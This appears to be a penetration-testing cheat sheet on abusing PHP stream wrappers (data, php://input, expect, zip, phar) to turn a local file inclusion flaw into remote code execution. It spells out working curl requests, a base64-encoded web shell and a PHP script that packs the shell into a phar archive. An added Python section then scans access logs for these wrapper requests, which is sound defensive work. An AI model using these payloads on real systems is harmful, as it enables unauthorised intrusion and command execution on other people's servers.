PHP Wrappers

Data Wrapper

Pre-requisites

allow_url_include must be enabled in php.ini:

/etc/php/X.Y/apache2/php.ini for Apache

/etc/php/X.Y/fpm/php.ini for Nginx

where X.Y is the PHP version.

Remote Code Execution

$ curl -s "http://<SERVER_IP>:<PORT>/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id"

Input Wrapper

Pre-requisites

allow_url_include must be enabled

Remote Code Execution

$ curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=id"

Expect Wrapper

Pre-requisites

The expect extension must be enabled (extension=expect)

Remote Code Execution

$ curl -s "http://<SERVER_IP>:<PORT>/index.php?language=expect://id"

Zip Wrapper

$ echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.zip shell.php
$ curl -s "http://<SERVER_IP>:<PORT>/index.php?language=zip://shell.zip%23shell.php&cmd=id"

Phar Wrapper

<?php
// shell.php: builds shell.phar containing shell.txt
$phar = new Phar('shell.phar');
$phar->startBuffering();
$phar->addFromString('shell.txt', '<?php system($_GET["cmd"]); ?>');
$phar->setStub('<?php __HALT_COMPILER(); ?>');
$phar->stopBuffering();

$ php --define phar.readonly=0 shell.php && mv shell.phar shell.zip
$ curl -s "http://<SERVER_IP>:<PORT>/index.php?language=phar://shell.zip%2Fshell.txt&cmd=id"
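
Detection

A detection-side counterpart to the wrapper requests above, as an added example that is not part of the original page: it flags access-log entries whose query parameters decode to one of the five wrapper schemes covered here, including double-encoded values. The log lines are constructed, and the function names and the combined log format are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, unquote

# Wrapper schemes covered on this page.
SCHEME_RE = re.compile(r"^\s*(data|php|expect|zip|phar):", re.IGNORECASE)
# Request line inside a combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded schemes are still seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def wrapper_hits(log_line):
    """Return (parameter, wrapper) pairs for values that start with a wrapper scheme."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    hits = []
    # Split on '&' only: the data wrapper value itself contains ';'.
    for pair in urlsplit(match.group("target")).query.split("&"):
        name, _, raw = pair.partition("=")
        scheme = SCHEME_RE.match(fully_decode(raw))
        if scheme:
            hits.append((unquote(name), scheme.group(1).lower()))
    return hits

def scan(lines):
    """Map 1-based line number -> hits for every entry that references a wrapper."""
    return {n: h for n, line in enumerate(lines, 1) if (h := wrapper_hits(line))}

# Constructed sample entries (documentation IP range, request paths as on this page).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?language=en.php HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?language=data://text/plain;base64,AAAA&cmd=id HTTP/1.1" 200 98',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "POST /index.php?language=php%253A%252F%252Finput&cmd=id HTTP/1.1" 200 98',
    '203.0.113.7 - - [01/Jan/2024:10:00:12 +0000] "GET /index.php?language=expect://id HTTP/1.1" 200 98',
    '203.0.113.7 - - [01/Jan/2024:10:00:15 +0000] "GET /index.php?language=zip://shell.zip%23shell.php&cmd=id HTTP/1.1" 200 98',
    '203.0.113.7 - - [01/Jan/2024:10:00:19 +0000] "GET /index.php?language=phar://shell.zip%2Fshell.txt&cmd=id HTTP/1.1" 200 98',
]

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG).items():
        print(number, hits)
```

For the input wrapper the PHP payload travels in the POST body, which access logs do not record, so the scheme in the URL is the only indicator this check can see.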
